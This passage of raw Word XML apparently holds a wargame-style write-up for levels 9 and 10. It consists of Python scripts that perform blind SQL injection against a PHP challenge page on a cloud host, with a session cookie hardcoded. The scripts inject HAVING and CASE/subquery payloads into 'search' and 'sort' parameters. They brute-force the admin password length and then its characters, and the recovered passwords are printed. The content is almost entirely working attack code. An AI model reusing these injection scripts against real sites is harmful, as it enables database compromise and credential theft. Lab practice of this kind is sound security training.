    <w:p w14:paraId="352BE91B" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">        'search</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>' :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> """admin%' having length(pw) &lt; """ + str(length) + """#"""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="709A81CE" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7272A33C" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">    param = parse.urlencode(query, encoding = 'UTF-8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32ED281D" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">    Myurl = lvurl+param</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F28A8FD" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">    Myreq = req.Request(Myurl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E7E48C" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">    Myreq.add_header('cookie', cookie)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C37CB9E" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">    Myres = req.urlopen(Myreq)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538B306F" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">    time.sleep(0.01)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DCDE978" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">    urllist = list(Myres)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F825D95" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">    beforecheck = re.compile("[*][I][D][*]")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="474D17C9" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">    index = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73966131" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">    for i in range(len(urllist)-1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1B9992" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        if (beforecheck.search(urllist[i].decode('utf-8'))):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CDF7126" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">            index = i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43048311" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">    idcheck = re.compile("[a][d][m][i][n]")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F24E8DD" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">    if(idcheck.search(urllist[index+1].decode("utf-8"))):      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="660616E9" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">        break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12A9E46E" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t>length = length - 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AAD0623" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t>print("length : {}".format(length))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD12CB3" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1"/>
    <w:p w14:paraId="45ACD3E0" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1"/>
    <w:p w14:paraId="1249142A" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t>password = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1897564B" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t>for k in range(length):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00D63638" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">    for j in range(128):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34EAB3F3" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">        val = chr(j)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B062E32" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">        if(val == '&amp;' or val == '|' or val == '_' or val == '=' or val =='%'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27270CFE" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">            continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="202A3FC9" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">        query = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FDDB323" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">            'search' : "admin%' having left(pw,"+str(k+1)+") like '" + password + val + "'#"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="472E0EE2" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFDC908" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">        param = parse.urlencode(query, encoding = 'UTF-8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F1620A8" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">        Myurl = lvurl+param</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EEFA452" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">        Myreq = req.Request(Myurl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7FCF14" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">        Myreq.add_header('cookie', cookie)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="743824AE" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">        Myres = req.urlopen(Myreq)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E40F10" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">        time.sleep(0.01)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5022A95C" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">        urllist = list(Myres)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CC81260" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">        beforecheck = re.compile("[*][*][I][D][*]")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0275D28F" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        index = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D1B57B7" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">        for i in range(len(urllist)-1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D010849" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">            if (beforecheck.search(urllist[i].decode('utf-8'))):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA7AC37" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">                index = i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A868FB2" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">                break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17439814" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">        idcheck = re.compile("[a][d][m][i][n]")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="172DE6D9" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">        if(idcheck.search(urllist[index+1].decode('utf-8'))):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56FDD36B" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">            password = password + val</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A49FBD" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t xml:space="preserve">            break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6090F6C4" w14:textId="77777777" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t>print("password : ", end='')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B088782" w14:textId="1691FD1A" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:t>print(password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79A77C86" w14:textId="56B61FE6" w:rsidR="006E1EA1" w:rsidRDefault="006E1EA1" w:rsidP="006E1EA1">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">v9 password : </w:t>
      </w:r>
      <w:r w:rsidRPr="006E1EA1">
        <w:t>P2W0RD</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F29419" w14:textId="54E78B79" w:rsidR="006E1EA1" w:rsidRDefault="006F0686" w:rsidP="006E1EA1">
      <w:r>
        <w:t>Lv10 code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC8E42F" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t>import urllib.request as req</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E68D3B" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t>import re</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42C4E614" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t>from urllib import parse</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16BB5859" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t>import time</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C3901F6" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686"/>
    <w:p w14:paraId="220CF39D" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t>lvurl = "http://ec2-54-180-137-70.ap-northeast-2.compute.amazonaws.com:8089//q/lv10.php?"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65EA9F2E" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t>cookie = "PHPSESSID=v60qksquc3rlei8nm71kg7d3tl"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E99D0C" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686"/>
    <w:p w14:paraId="413AC06F" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t>length = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F52B88" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t>while (1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2993C5A4" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">    length = length + 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2511F820" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">    query = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D68AB68" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">        'sort' : ",(select case when ((select id from tb_lv10 where length(pw)="+str(length)+" and id </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>= 'admin')='admin') then 1 else 1*(select pw from tb_lv10)end)=1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73848F11" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F717AA8" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">    param = parse.urlencode(query, encoding = 'UTF-8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F7B660E" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">    Myurl = lvurl+param</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C071DEC" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">    Myreq = req.Request(Myurl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7813C3DE" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">    Myreq.add_header('cookie', cookie)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="294E1363" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">    Myres = req.urlopen(Myreq)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="334A7AA2" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">    time.sleep(0.01)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4F5F22" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">    urllist = list(Myres)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F0183BA" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">    beforecheck = re.compile("[*][I][D][*]")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38275162" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">    index = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5769FC22" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">    for i in range(len(urllist)-1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FA94E6" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">        if (beforecheck.search(urllist[i].decode('utf-8'))):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="032EE84A" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">            index = i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39922338" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">    idcheck = re.compile("[a][d][m][i][n]")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="365DE800" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">    if(idcheck.search(urllist[index+1].decode("utf-8"))):      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B9A0B83" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">        break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FB86D50" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t>print("length : {}".format(length))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11469645" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686"/>
    <w:p w14:paraId="5BFF8073" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686"/>
    <w:p w14:paraId="73EF9C22" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t>password = ""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A45B4D2" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t>for k in range(length):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F36A87D" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">    for j in range(128):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEAB933" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">        val = chr(j)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DCFA1AF" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">        if(val == '&amp;' or val == '|' or val == '_' or val == '=' or val =='%'):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="117A8D58" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">            continue</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="258D297C" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        query = {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="337D3C96" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">            'sort' : ",(select case when ((select id from tb_lv10 where left(pw,"+str(k+1)+") like '" + password + val + "' and id = 'admin')='admin') then 1 else 1*(select pw from tb_lv10)end)=1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="668A055B" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FC5D1B" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">        param = parse.urlencode(query, encoding = 'UTF-8')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078CC7FA" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">        Myurl = lvurl+param</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE07C44" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">        Myreq = req.Request(Myurl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="450C0A41" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">        Myreq.add_header('cookie', cookie)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79F23960" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">        Myres = req.urlopen(Myreq)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C9008F1" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">        time.sleep(0.01)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB3E324" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">        urllist = list(Myres)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C1D8A89" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">        beforecheck = re.compile("[*][*][I][D][*]")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="545874EC" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">        index = 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="608A62B1" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">        for i in range(len(urllist)-1):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F8FBCA" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">            if (beforecheck.search(urllist[i].decode('utf-8'))):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65E045E7" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">                index = i</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E6A0BB" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">                break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15B122C4" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">        idcheck = re.compile("[a][d][m][i][n]")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="478F8435" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">        if(idcheck.search(urllist[index+1].decode('utf-8'))):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CFB846" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">            password = password + val</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DD3929" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t xml:space="preserve">            break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE6AAAC" w14:textId="77777777" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t>print("password : ", end='')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51DE7939" w14:textId="4AA56AB6" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:r>
        <w:t>print(password)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FBB5BD" w14:textId="561E1BF4" w:rsidR="006F0686" w:rsidRDefault="006F0686" w:rsidP="006F0686">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">v10 password : </w:t>
      </w:r>
      <w:r w:rsidRPr="006F0686">
        <w:t>G00DBY2</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="006F0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3D2F2" w14:textId="77777777" w:rsidR="00501786" w:rsidRDefault="00501786" w:rsidP="00BB59C1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="7DECD1A6" w14:textId="77777777" w:rsidR="00501786" w:rsidRDefault="00501786" w:rsidP="00BB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AE5C9" w14:textId="77777777" w:rsidR="00501786" w:rsidRDefault="00501786" w:rsidP="00BB59C1">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2848BF26" w14:textId="77777777" w:rsidR="00501786" w:rsidRDefault="00501786" w:rsidP="00BB5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57"/>
    <w:rsid w:val="00066452"/>
    <w:rsid w:val="000C6D84"/>
    <w:rsid w:val="00150DF4"/>
    <w:rsid w:val="001C7864"/>
    <w:rsid w:val="002D24A3"/>
    <w:rsid w:val="00321257"/>
    <w:rsid w:val="004A5F92"/>
    <w:rsid w:val="004B0505"/>
    <w:rsid w:val="00501786"/>
    <w:rsid w:val="00590641"/>
    <w:rsid w:val="005A54E6"/>
    <w:rsid w:val="006E1EA1"/>
    <w:rsid w:val="006E45E0"/>
    <w:rsid w:val="006F0686"/>
    <w:rsid w:val="007113B9"/>
